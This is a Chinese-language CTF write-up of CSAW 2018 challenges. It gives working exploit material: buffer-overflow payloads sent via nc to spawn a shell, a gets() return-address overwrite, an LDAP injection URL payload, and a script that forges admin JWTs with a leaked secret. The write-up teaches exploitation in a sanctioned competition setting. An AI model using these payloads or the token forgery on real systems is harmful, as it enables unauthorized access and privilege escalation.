题目
yeeeeeeeeeeeeeeeeeeeeeeeeeeeeeet single yeet yeeted with single yeet == 0 yeeet what is yeet? yeet is yeet Yeetdate: yeeted yeet at yeet: 9:42 pm
提示single yeet yeeted with single yeet == 0
想到a XOR a == 0,可能是单字的xor加密
ciphertext
s5qQkd+WjN+e34+NkJiNnpKSmo3fiJeQ356Mj5aNmozfi5DfnI2anoua34+NkJiNnpKM34uXnovfl5qTj9+PmpCPk5rfm5Dfk5qMjNHft5rfiJ6Ri4zfi5Dfj4qL356Ki5CSnouWkJHfmZaNjIvT356Rm9+MnJ6Tnp2Wk5aLht+ek5CRmIyWm5rR37ea35uNmp6SjN+Qmd+e34iQjZOb34iXmo2a34uXmt+akZuTmoyM356Rm9+Ll5rflpGZlpGWi5rfnZqckJKa342anpOWi5aajN+LkN+SnpGUlpGb09+ekZvfiJeajZrfi5ea34uNiprfiZ6TiprfkJnfk5aZmt+WjN+PjZqMmo2JmpvRmZOemISblpmZlprSl5qTk5KekdKYz4+XzI2FjZ6wps61npPLnLeeuabGrKithr6uyZ63gg==
首先要将密文base64解码,再进行xor运算,脚本如下
from pwn import * from base64 import b64decode ciphertext = b64decode("s5qQkd+WjN+e34+NkJiNnpKSmo3fiJeQ356Mj5aNmozfi5DfnI2anoua34+NkJiNnpKM34uXnovfl5qTj9+PmpCPk5rfm5Dfk5qMjNHft5rfiJ6Ri4zfi5Dfj4qL356Ki5CSnouWkJHfmZaNjIvT356Rm9+MnJ6Tnp2Wk5aLht+ek5CRmIyWm5rR37ea35uNmp6SjN+Qmd+e34iQjZOb34iXmo2a34uXmt+akZuTmoyM356Rm9+Ll5rflpGZlpGWi5rfnZqckJKa342anpOWi5aajN+LkN+SnpGUlpGb09+ekZvfiJeajZrfi5ea34uNiprfiZ6TiprfkJnfk5aZmt+WjN+PjZqMmo2JmpvRmZOemISblpmZlprSl5qTk5KekdKYz4+XzI2FjZ6wps61npPLnLeeuabGrKithr6uyZ63gg==") for key in range(256): plaintext = xor(key, ciphertext) if "flag{" in plaintext: print plaintext
flag:flag{diffie-hellman-g0ph3rzraOY1Jal4cHaFY9SWRyAQ6aH}
题目
no logos or branding for this bug Take your pick nc crypto.chal.csaw.io 8040 nc crypto.chal.csaw.io 8041 nc crypto.chal.csaw.io 8042 nc crypto.chal.csaw.io 8043 flag is not in flag format. flag is PROBLEM_KEY
serv-distribute.py
import zlib import os from Crypto.Cipher import AES from Crypto.Util import Counter ENCRYPT_KEY = bytes.fromhex('0000000000000000000000000000000000000000000000000000000000000000') # Determine this key. # Character set: lowercase letters and underscore PROBLEM_KEY = 'not_the_flag' def encrypt(data, ctr): return AES.new(ENCRYPT_KEY, AES.MODE_CTR, counter=ctr).encrypt(zlib.compress(data)) while True: f = input("Encrypting service\n") if len(f) <20: continue enc = encrypt(bytes((PROBLEM_KEY + f).encode('utf-8')), Counter.new(64, prefix=os.urandom(8))) print("%s%s" %(enc, chr(len(enc))))
题目
nc pwn.chal.csaw.io 9000
无论输入什么都只打印一个时间就退出了,拖进ida看看
我们要将程序将跳转到调用系统的函数才可以。
修改eax的值
nc pwn.chal.csaw.io 9000 <<<$(python -c "print 'aaaaaaaaaaaaaaaaaaaa\xee\xba\xf3\xca'")
看看有些什么
nc pwn.chal.csaw.io 9000 <<<$(python -c "print 'aaaaaaaaaaaaaaaaaaaa\xee\xba\xf3\xcals'")
有个flag.txt
nc pwn.chal.csaw.io 9000 <<<$(python -c "print 'aaaaaaaaaaaaaaaaaaaa\xee\xba\xf3\xcacat flag.txt'")
flag:flag{Y0u_Arrre_th3_Bi66Est_of_boiiiiis}
题目
Do you get it? nc pwn.chal.csaw.io 9001
无论输入什么都会重复你输入的然后退出。
objdump -d get_it
00000000004005b6: 4005b6: 55 push %rbp 4005b7: 48 89 e5 mov %rsp,%rbp 4005ba: bf 84 06 40 00 mov $0x400684,%edi 4005bf: e8 bc fe ff ff callq 400480 4005c4: 90 nop 4005c5: 5d pop %rbp 4005c6: c3 retq 00000000004005c7 : 4005c7: 55 push %rbp 4005c8: 48 89 e5 mov %rsp,%rbp 4005cb: 48 83 ec 30 sub $0x30,%rsp 4005cf: 89 7d dc mov %edi,-0x24(%rbp) 4005d2: 48 89 75 d0 mov %rsi,-0x30(%rbp) 4005d6: bf 8e 06 40 00 mov $0x40068e,%edi 4005db: e8 90 fe ff ff callq 400470 4005e0: 48 8d 45 e0 lea -0x20(%rbp),%rax 4005e4: 48 89 c7 mov %rax,%rdi 4005e7: b8 00 00 00 00 mov $0x0,%eax 4005ec: e8 af fe ff ff callq 4004a0 4005f1: b8 00 00 00 00 mov $0x0,%eax 4005f6: c9 leaveq 4005f7: c3 retq 4005f8: 0f 1f 84 00 00 00 00 nopl 0x0(%rax,%rax,1) 4005ff: 00
注意这两个函数,main中gets非常可疑,再查看下give_shell函数0x400684
(gdb) x/s 0x400684 0x400684: "/bin/bash"
这是要调用system("/bin/bash");搞事啊!!!那就来一波ida F5
int __cdecl main(int argc, const char **argv, const char **envp) { char v4; // [rsp+10h] [rbp-20h] puts("Do you gets it??"); gets(&v4); return 0; } int give_shell() { return system("/bin/bash"); }
gets(char * s)接受一个参数,它将写入的内存中的位置,然后它将写入你输入的所有字符,lea指令只是做了一些数学运算。在这里表示rax = rbp - 0x20,顺便说一句,0x20 = 32,我们用A来填充获取的局部变量缓冲区。
(gdb) break *0x00000000004005f6 Breakpoint 1 at 0x4005f6 (gdb) run Starting program: /get_it Do you gets it?? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Breakpoint 1, 0x00000000004005f6 in main () (gdb) x/6xg $rbp - 0x20 0x7fffffffde90: 0x4141414141414141 0x4141414141414141 0x7fffffffdea0: 0x4141414141414141 0x4141414141414141 0x7fffffffdeb0: 0x0000000000400600 0x00007ffff7e11b17
测试一下
python -c "print 'A' * 32 + 'B'*8 + '\xb6\x05@\x00\x00\x00\x00\x00'" > test
(gdb) runok,进入give_shell
flag:flag{y0u_deF_get_itls}
misc
Short Circuit
题目
Start from the monkey's paw and work your way down the high voltage line, for every wire that is branches off has an element that is either on or off. Ignore the first bit. Standard flag format. Elyk下载图片下来
这个就是很多个LED灯连在一起,分析一下,连了地线的表示"1",其他表示"0",
最后表示
flag:flag{owmyhand}
Algebra
题目
Are you a real math wiz? nc misc.chal.csaw.io 9002
就是根据他的等式来接X,题目会越来越难,写个脚本就可以解开
from pwn import * from re import * r = remote("misc.chal.csaw.io", 9002) r.recvuntil("*********") r.recvline() while True: task = r.recvline() print task print r.recvuntil("What does X equal?: ") eq1 = task.replace("=","-(")+")" c = eval(eq1,{"X":1j}) result = 0 if c.imag != 0: result = -c.real/c.imag r.sendline(str(result)) print r.recvline()
flag:flag{y0u_s0_60od_aT_tH3_qU1cK_M4tH5}
Take an L
题目
Fill the grid with L's but avoid the marked spot for the W nc misc.chal.csaw.io 9000 The origin is at (0,0) on the top left通过google,发现了 这个
使用的算法是recursiv,我们在网格的中间放置一个“L”(L-tromino),然后我们将网格分割成子网格,并为每个子网格执行相同的过程。当网格与我们的“L”(2 * 2)大小相同时,递归函数停止。
# -*- coding:utf-8 -*- from pwn import * HOST = "misc.chal.csaw.io" PORT = 9000 r = remote(HOST, PORT) def send(c): print(c) r.sendline(c) rec = r.recvuntil("marked block: ") print(rec) black = eval(r.recvuntil("\n").strip()) print("Black cell: "+str(black)) n = 64 a = [[' ' for x in range(n)] for y in range(n)] a[black[1]][black[0]] = "@" def pgrille(): out = "" out += "-"*n out += "\n" for l in a: out += str(''.join([x for x in l]))+"\n" out += "-"*n with open("logs","a+") as fi: fi.write(out+"\n\n\n") def getBlack(a,x_start,y_start,x_end,y_end): for j in range(y_start,y_end+1): for i in range(x_start,x_end+1): if a[j][i] == "o" or a[j][i] == "@": return i,j return None,None def Tile(a,x_start,y_start,x_end,y_end): xcenter_left = x_start+((x_end-x_start)/2) xcenter_right = xcenter_left+1 ycenter_top = y_start+((y_end-y_start)/2) ycenter_bottom = ycenter_top+1 xBlack,yBlack = getBlack(a,x_start,y_start,x_end,y_end) if xBlack <= xcenter_left: if yBlack <= ycenter_top: a[ycenter_top][xcenter_right] = "o" a[ycenter_bottom][xcenter_right] = "o" a[ycenter_bottom][xcenter_left] = "o" send("("+str(xcenter_right)+","+str(ycenter_top)+"),("+str(xcenter_right)+","+str(ycenter_bottom)+"),("+str(xcenter_left)+","+str(ycenter_bottom)+")") else: a[ycenter_top][xcenter_left] = "o" a[ycenter_top][xcenter_right] = "o" a[ycenter_bottom][xcenter_right] = "o" send("("+str(xcenter_left)+","+str(ycenter_top)+"),("+str(xcenter_right)+","+str(ycenter_top)+"),("+str(xcenter_right)+","+str(ycenter_bottom)+")") else: if yBlack <= ycenter_top: a[ycenter_top][xcenter_left] = "o" a[ycenter_bottom][xcenter_left] = "o" a[ycenter_bottom][xcenter_right] = "o" send("("+str(xcenter_left)+","+str(ycenter_top)+"),("+str(xcenter_left)+","+str(ycenter_bottom)+"),("+str(xcenter_right)+","+str(ycenter_bottom)+")") else: a[ycenter_bottom][xcenter_left] = "o" a[ycenter_top][xcenter_left] = "o" a[ycenter_top][xcenter_right] = "o" send("("+str(xcenter_left)+","+str(ycenter_bottom)+"),("+str(xcenter_left)+","+str(ycenter_top)+"),("+str(xcenter_right)+","+str(ycenter_top)+")") pgrille() if abs(x_end-x_start) > 1: Tile(a,x_start,y_start,xcenter_left,ycenter_top) Tile(a,xcenter_right,y_start,x_end,ycenter_top) Tile(a,x_start,ycenter_bottom,xcenter_left,y_end) Tile(a,xcenter_right,ycenter_bottom,x_end,y_end) Tile(a,0,0,len(a[0])-1,len(a)-1) r.interactive()参考大佬 代码
flag:flag{m@n_that_was_sup3r_hard_i_sh0uld_have_just_taken_the_L}
web
Ldab
题目
dab http://web.chal.csaw.io:8080一个简单的LDAP注入
payload:http://web.chal.csaw.io:8080/index.php/index.php?search=*)(uid=*))(|(uid=*
flag:
flag{ld4p_inj3ction_i5_a_th1ng}
sso
题目
Be the admin you were always meant to be http://web.chal.csaw.io:9000 Update chal description at: 4:38 to include solve details Aesthetic update for chal at Sun 7:25 AM首先查看源码
Welcome to our SINGLE SIGN ON PAGE WITH FULL OAUTH2.0!
.根据判断应该是基于OAuth2.0协议的身份验证,
不了解的童鞋可以看看这篇文章
https://tools.ietf.org/html/rfc6749
https://tools.ietf.org/html/rfc6750
https://blog.csdn.net/cd_xuyue/article/details/52084220首先我要获取一个code,用burp抓包 http://web.chal.csaw.io:9000/protected
在/oauth2/authorize中response_type必须要填,而且为code,redirect_uri将传递给重定向端点的绝对URI
我们将返回一个code,我们再次修改数据包发送Access Token Request
code的参数就是刚才返回的code值,这样我们将得到一个token,这个要使用jwt解码才能看见里面的内容,
jwt解码网站 https://jwt.io/
根据题目提示,我们要将type改成admin才可以
参考大佬的加密脚本
#!/usr/bin/env python3 # -*- coding: utf8 -*- import base64 import time import hashlib import hmac import json import sys from collections import OrderedDict def dump_tokens(jwt): p1, p2, p3 = jwt.split('.', 3) header = decode_token(p1) payload = decode_token(p2) return header, payload def decode_token(token): token_len = len(token) padded_token = token.ljust(token_len + (token_len % 4), '=') dict_ = json.loads(base64.b64decode(padded_token), object_pairs_hook=OrderedDict) return dict_ def base64_encode(data): return base64.b64encode(data).decode().strip('=') def encode_token(dict_): json_data = json.dumps(dict_, separators=(',', ':')).encode() token = base64_encode(json_data) return token def sign_token(header, payload, secret): jwt = encode_token(header) + '.' # header jwt += encode_token(payload) + '.' # payload signature = base64_encode(hmac.new(secret.encode(), jwt[:-1].encode(), hashlib.sha256).digest()) signature = signature.replace('/', '_').replace('+', '-') jwt += signature return jwt if len(sys.argv) <1: print(f'Usage {sys.argv[0]}') else: header, payload = dump_tokens(sys.argv[1]) # get original JWT as dict print(f'''Original JWT values: * header: {dict(header)} * payload: {dict(payload)} ''') new_header = header new_payload = payload # Update user type new_payload['type'] = 'admin' # Update expiration time unix_ts = int(time.time()) flag_window = 600 new_payload['iat'] = unix_ts new_payload['exp'] = unix_ts + flag_window print(f'''New JWT values: * header: {dict(header)} * payload: {dict(payload)} ''') # Generate new JWT (signature) new_jwt = sign_token(header, payload, payload['secret']) print(f'New signed JWT: {new_jwt}') 运行脚本
得到新的
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0eXBlIjoiYWRtaW4iLCJzZWNyZXQiOiJ1Zm91bmRtZSEiLCJpYXQiOjE1MzczMzcyNTcsImV4cCI6MTUzNzMzNzg1N30.LVpR0h6soIt3A3IRqis-T1nywLn_D_taJQhFTZdw9SE重新发送
flag:flag{JsonWebTokensaretheeasieststorage-lessdataoptiononthemarket!theyrelyonsupersecureblockchainlevelencryptionfortheirmethods}
https://gitlab.com/mahham/ctf/blob/master/2018-csaw/Readme.md#babycrypto-50-crypto
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 我们